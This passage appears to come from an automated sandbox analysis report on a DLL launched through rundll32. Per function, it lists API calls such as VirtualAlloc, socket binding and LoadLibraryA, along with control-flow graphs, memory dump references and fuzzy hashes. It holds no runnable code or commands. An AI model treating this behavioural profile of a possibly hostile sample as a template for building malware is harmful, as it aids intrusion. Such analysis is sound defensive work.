                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 1263568516-0
                                                                                                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                                                                                                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 191 100024d0-100024fe 192 10002512-1000251e 191->192 193 10002524-1000252b 192->193 194 10002616 192->194 196 10002593-100025ae call 100024a0 193->196 197 1000252d-1000253a 193->197 195 1000261b-1000261e 194->195 206 100025b0-100025b2 196->206 207 100025b4-100025d9 VirtualAlloc 196->207 199 1000253c-1000255e VirtualAlloc 197->199 200 1000258e 197->200 201 10002560-10002562 199->201 202 10002567-1000258b call 100022d0 199->202 200->192 201->195 202->200 206->195 209 100025db-100025dd 207->209 210 100025df-1000260e call 10002320 207->210 209->195 210->194
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                                                                                                          • Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10024BD7
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                            • Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66
                                                                                                            • Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1104862767-0
                                                                                                          • Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
                                                                                                          • Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 246 1001fb60-1001fba1 call 100236ce 248 1001fba3-1001fbaa 246->248 249 1001fbb1-1001fbb7 248->249 250 1001fbac call 1001fb50 248->250 252 1001fbc1-1001fbc4 249->252 253 1001fbb9-1001fbbf 249->253 250->249 254 1001fbc7-1001fc07 call 1002e804 252->254 253->254 257 1001fc09-1001fc19 254->257 258 1001fc1e-1001fc2c 254->258 257->258
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2001391462-0
                                                                                                          • Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
                                                                                                          • Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 260 1002b0bb-1002b0d3 call 10030535 263 1002b0d5 call 10023b5b 260->263 264 1002b0da-1002b0dd 260->264 263->264 266 1002b115-1002b126 call 1002ac8f 264->266 267 1002b0df-1002b0e7 264->267 276 1002b13b-1002b142 call 1003060d 266->276 277 1002b128-1002b136 call 1002af6b 266->277 269 1002b10a call 1002adac 267->269 270 1002b0e9-1002b108 call 1002aec4 267->270 275 1002b10f-1002b113 269->275 270->263 270->269 275->263 275->266 277->276
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 1002B0C2
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8H_prolog3Throw
                                                                                                          • String ID:
                                                                                                          • API String ID: 3670251406-0
                                                                                                          • Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
                                                                                                          • Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 282 10008000-1000801a call 1002e654 285 10008023-10008037 282->285 286 1000801c-10008021 282->286 288 1000804b-10008052 285->288 287 1000807b-1000807e 286->287 289 10008054-1000805c 288->289 290 1000805e-10008062 call 1002e577 288->290 289->288 293 10008067-10008070 290->293 294 10008072-10008074 293->294 295 10008076 293->295 294->287 295->287
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 1000800B
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 501242067-0
                                                                                                          • Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
                                                                                                          • Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 296 100236ce-100236dc 297 100236e2-100236ed call 1002e654 296->297 298 100236de-100236e0 296->298 301 100236f2-100236f5 297->301 299 10023707-1002370a 298->299 301->298 302 100236f7-10023704 301->302 302->299
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1579825452-0
                                                                                                          • Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
                                                                                                          • Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 303 1002acfb-1002ad0d call 10030568 306 1002ad30-1002ad37 call 1003060d 303->306 307 1002ad0f-1002ad1e call 1002a6ab 303->307 312 1002ad20 call 10024d0b 307->312 313 1002ad25-1002ad2b call 1002a71d 307->313 315 1002ad23 312->315 313->306 315->313
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 1641187343-0
                                                                                                          • Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
                                                                                                          • Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 317 10035645-10035667 HeapCreate 318 1003566b-10035674 317->318 319 10035669-1003566a 317->319
                                                                                                          APIs
                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 10892065-0
                                                                                                          • Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
                                                                                                          • Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___getlocaleinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1937885557-0
                                                                                                          • Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
                                                                                                          • Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,?), ref: 10001194
                                                                                                          • _memset.LIBCMT ref: 100011A8
                                                                                                          • htonl.WS2_32(00000000), ref: 100011C1
                                                                                                          • htons.WS2_32(?), ref: 100011D5
                                                                                                          • socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
                                                                                                          • bind.WS2_32(?,?,00000010), ref: 10001210
                                                                                                          • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1003240404-0
                                                                                                          • Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
                                                                                                          • Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001DFC0, Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsIconic.USER32 ref: 1001DFE3
                                                                                                            • Part of subcall function 10024266: __EH_prolog3.LIBCMT ref: 1002426D
                                                                                                            • Part of subcall function 10024266: BeginPaint.USER32(?,?,00000004,10022D30,?,00000058,1001E0C9), ref: 10024299
                                                                                                          • SendMessageA.USER32(?,00000027,?,00000000), ref: 1001E031
                                                                                                          • GetSystemMetrics.USER32 ref: 1001E039
                                                                                                          • GetSystemMetrics.USER32 ref: 1001E044
                                                                                                          • GetClientRect.USER32 ref: 1001E05B
                                                                                                          • DrawIcon.USER32 ref: 1001E0AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1007970657-0
                                                                                                          • Opcode ID: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
                                                                                                          • Instruction ID: 44eb2ef316f0b933980e992ec3fa30d6a4f6e9fba2b57c8abd37e2d05c6bd9c1
                                                                                                          • Opcode Fuzzy Hash: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
                                                                                                          • Instruction Fuzzy Hash: 4A31EA75A00119DFDB24CFA8C985FAEBBB5FB48300F108299E549E7241DA30AE84DF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strcpy_s.LIBCMT ref: 100212CD
                                                                                                            • Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                            • Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
                                                                                                          • __snwprintf_s.LIBCMT ref: 1002131A
                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 10021355
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
